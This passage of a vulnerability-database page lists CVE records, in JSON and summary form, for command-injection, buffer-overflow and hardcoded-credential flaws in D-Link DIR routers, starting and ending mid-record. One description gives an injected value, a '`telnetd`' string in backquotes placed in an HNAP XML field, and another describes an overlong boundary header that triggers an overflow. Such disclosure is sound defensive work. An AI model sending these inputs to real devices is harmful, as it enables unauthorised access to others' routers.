"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-02-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-03-06T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-6530",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"name": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"name": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto",
"refsource": "MISC",
"url": "https://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-proto"
},
{
"name": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"name": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf",
"refsource": "CONFIRM",
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-6530",
"datePublished": "2018-03-06T20:00:00.000Z",
"dateReserved": "2018-02-02T00:00:00.000Z",
"dateUpdated": "2025-02-04T20:36:49.671Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-6563
Vulnerability from cvelistv5
Published
2018-07-13 20:00
Modified
2024-08-06 01:36
Severity ?
EPSS score ?
Summary
Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.exploit-db.com/exploits/40805/ | exploit, x_refsource_EXPLOIT-DB | |
| https://www.kb.cert.org/vuls/id/677427 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.securityfocus.com/bid/94130 | vdb-entry, x_refsource_BID | |
| http://seclists.org/fulldisclosure/2016/Nov/38 | mailing-list, x_refsource_FULLDISC |
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T01:36:28.095Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "40805",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"name": "VU#677427",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "https://www.kb.cert.org/vuls/id/677427"
},
{
"name": "94130",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/94130"
},
{
"name": "20161107 [CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Nov/38"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "DIR-823",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-822",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-818L(W)",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-895L",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-890L",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-885L",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-880L",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-868L",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
},
{
"product": "DIR-850L",
"vendor": "D-Link",
"versions": [
{
"status": "unknown",
"version": "N/A"
}
]
}
],
"datePublic": "2016-11-07T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-07-14T09:57:01",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"name": "40805",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"name": "VU#677427",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "https://www.kb.cert.org/vuls/id/677427"
},
{
"name": "94130",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/94130"
},
{
"name": "20161107 [CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Nov/38"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link DIR routers contain a stack-based buffer overflow in the HNAP Login action",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2016-6563",
"STATE": "PUBLIC",
"TITLE": "D-Link DIR routers contain a stack-based buffer overflow in the HNAP Login action"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "DIR-823",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-822",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-818L(W)",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-895L",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-890L",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-885L",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-880L",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-868L",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
},
{
"product_name": "DIR-850L",
"version": {
"version_data": [
{
"affected": "?",
"version_affected": "?",
"version_value": "N/A"
}
]
}
}
]
},
"vendor_name": "D-Link"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-121"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "40805",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"name": "VU#677427",
"refsource": "CERT-VN",
"url": "https://www.kb.cert.org/vuls/id/677427"
},
{
"name": "94130",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/94130"
},
{
"name": "20161107 [CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Nov/38"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2016-6563",
"datePublished": "2018-07-13T20:00:00",
"dateReserved": "2016-08-03T00:00:00",
"dateUpdated": "2024-08-06T01:36:28.095Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-5681
Vulnerability from cvelistv5
Published
2016-08-25 21:00
Modified
2024-08-06 01:08
Severity ?
EPSS score ?
Summary
Stack-based buffer overflow in dws/api/Login on D-Link DIR-850L B1 2.07 before 2.07WWB05, DIR-817 Ax, DIR-818LW Bx before 2.05b03beta03, DIR-822 C1 3.01 before 3.01WWb02, DIR-823 A1 1.00 before 1.00WWb05, DIR-895L A1 1.11 before 1.11WWb04, DIR-890L A1 1.09 before 1.09b14, DIR-885L A1 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08, DIR-868L B1 2.03 before 2.03WWb01, and DIR-868L C1 3.00 before 3.00WWb01 devices allows remote attackers to execute arbitrary code via a long session cookie.
References
| ▼ | URL | Tags |
|---|---|---|
| http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063 | x_refsource_CONFIRM | |
| http://www.kb.cert.org/vuls/id/332115 | third-party-advisory, x_refsource_CERT-VN | |
| http://www.securityfocus.com/bid/92427 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T01:08:00.489Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063"
},
{
"name": "VU#332115",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/332115"
},
{
"name": "92427",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/92427"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-08-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in dws/api/Login on D-Link DIR-850L B1 2.07 before 2.07WWB05, DIR-817 Ax, DIR-818LW Bx before 2.05b03beta03, DIR-822 C1 3.01 before 3.01WWb02, DIR-823 A1 1.00 before 1.00WWb05, DIR-895L A1 1.11 before 1.11WWb04, DIR-890L A1 1.09 before 1.09b14, DIR-885L A1 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08, DIR-868L B1 2.03 before 2.03WWb01, and DIR-868L C1 3.00 before 3.00WWb01 devices allows remote attackers to execute arbitrary code via a long session cookie."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01",
"orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"shortName": "certcc"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063"
},
{
"name": "VU#332115",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/332115"
},
{
"name": "92427",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/92427"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cert@cert.org",
"ID": "CVE-2016-5681",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in dws/api/Login on D-Link DIR-850L B1 2.07 before 2.07WWB05, DIR-817 Ax, DIR-818LW Bx before 2.05b03beta03, DIR-822 C1 3.01 before 3.01WWb02, DIR-823 A1 1.00 before 1.00WWb05, DIR-895L A1 1.11 before 1.11WWb04, DIR-890L A1 1.09 before 1.09b14, DIR-885L A1 1.11 before 1.11WWb07, DIR-880L A1 1.07 before 1.07WWb08, DIR-868L B1 2.03 before 2.03WWb01, and DIR-868L C1 3.00 before 3.00WWb01 devices allows remote attackers to execute arbitrary code via a long session cookie."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063",
"refsource": "CONFIRM",
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10063"
},
{
"name": "VU#332115",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/332115"
},
{
"name": "92427",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/92427"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
"assignerShortName": "certcc",
"cveId": "CVE-2016-5681",
"datePublished": "2016-08-25T21:00:00",
"dateReserved": "2016-06-16T00:00:00",
"dateUpdated": "2024-08-06T01:08:00.489Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-29321
Vulnerability from cvelistv5
Published
2021-06-04 19:40
Modified
2024-08-04 16:48
Severity ?
EPSS score ?
Summary
The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data.
References
| ▼ | URL | Tags |
|---|---|---|
| https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| n/a | D-Link Router DIR-868L |
Version: 3.01 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T16:48:01.785Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "D-Link Router DIR-868L",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "3.01"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Hardcoded Credentials",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-06-04T19:40:19",
"orgId": "ee1bbb37-1770-46bd-bba8-910037954ee0",
"shortName": "CSW"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "disclose@cybersecurityworks.com",
"ID": "CVE-2020-29321",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "D-Link Router DIR-868L",
"version": {
"version_data": [
{
"version_value": "3.01"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The D-Link router DIR-868L 3.01 is vulnerable to credentials disclosure in telnet service through decompilation of firmware, that allows an unauthenticated attacker to gain access to the firmware and to extract sensitive data."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Hardcoded Credentials"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html",
"refsource": "MISC",
"url": "https://cybersecurityworks.com/zerodays/cve-2020-29321-telnet-hardcoded-credentials.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "ee1bbb37-1770-46bd-bba8-910037954ee0",
"assignerShortName": "CSW",
"cveId": "CVE-2020-29321",
"datePublished": "2021-06-04T19:40:19",
"dateReserved": "2020-11-27T00:00:00",
"dateUpdated": "2024-08-04T16:48:01.785Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-29856
Vulnerability from cvelistv5
Published
2023-05-02 00:00
Modified
2024-08-02 14:14
Severity ?
EPSS score ?
Summary
D-Link DIR-868L Hardware version A1, firmware version 1.12 is vulnerable to Buffer Overflow. The vulnerability is in scandir.sgi binary.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T14:14:39.978Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"tags": [
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10325"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-868L Hardware version A1, firmware version 1.12 is vulnerable to Buffer Overflow. The vulnerability is in scandir.sgi binary."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-02T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10325"
}
],
"tags": [
"unsupported-when-assigned"
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-29856",
"datePublished": "2023-05-02T00:00:00",
"dateReserved": "2023-04-07T00:00:00",
"dateUpdated": "2024-08-02T14:14:39.978Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-14948
Vulnerability from cvelistv5
Published
2019-10-14 17:03
Modified
2024-08-05 19:42
Severity ?
EPSS score ?
Summary
Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with ''boundary=' followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/badnack/d_link_880_bug/blob/master/README.md | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T19:42:22.242Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/badnack/d_link_880_bug/blob/master/README.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with \u0027\u0027boundary=\u0027 followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-14T17:03:25",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/badnack/d_link_880_bug/blob/master/README.md"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-14948",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with \u0027\u0027boundary=\u0027 followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/badnack/d_link_880_bug/blob/master/README.md",
"refsource": "MISC",
"url": "https://github.com/badnack/d_link_880_bug/blob/master/README.md"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-14948",
"datePublished": "2019-10-14T17:03:25",
"dateReserved": "2017-09-29T00:00:00",
"dateUpdated": "2024-08-05T19:42:22.242Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-19988
Vulnerability from cvelistv5
Published
2019-05-13 13:24
Modified
2024-08-05 11:51
Severity ?
EPSS score ?
Summary
In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. It needs to bypass the wget command option with a single quote. A vulnerable /HNAP1/SetClientInfoDemo XML message could have single quotes and backquotes in the AudioMute or AudioEnable element, such as the '`telnetd`' string.
References
| ▼ | URL | Tags |
|---|---|---|
| https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T11:51:18.144Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. It needs to bypass the wget command option with a single quote. A vulnerable /HNAP1/SetClientInfoDemo XML message could have single quotes and backquotes in the AudioMute or AudioEnable element, such as the \u0027`telnetd`\u0027 string."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-13T13:24:27",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pr0v3rbs/CVE/tree/master/CVE-2018-19986%20-%2019990"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-19988",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In the /HNAP1/SetClientInfoDemo message, the AudioMute and AudioEnable parameters are vulnerable, and the vulnerabilities affect D-Link DIR-868L Rev.B 2.05B02 devices. In the SetClientInfoDemo.php source code, the AudioMute and AudioEnble parameters are saved in the ShellPath script file without any regex checking. After the script file is executed, the command injection occurs. It needs to bypass the wget command option with a single quote. A vulnerable /HNAP1/SetClientInfoDemo XML message could have single quotes and backquotes in the AudioMute or AudioEnable element, such as the \u0027`telnetd`\u0027 string."
}
]
},
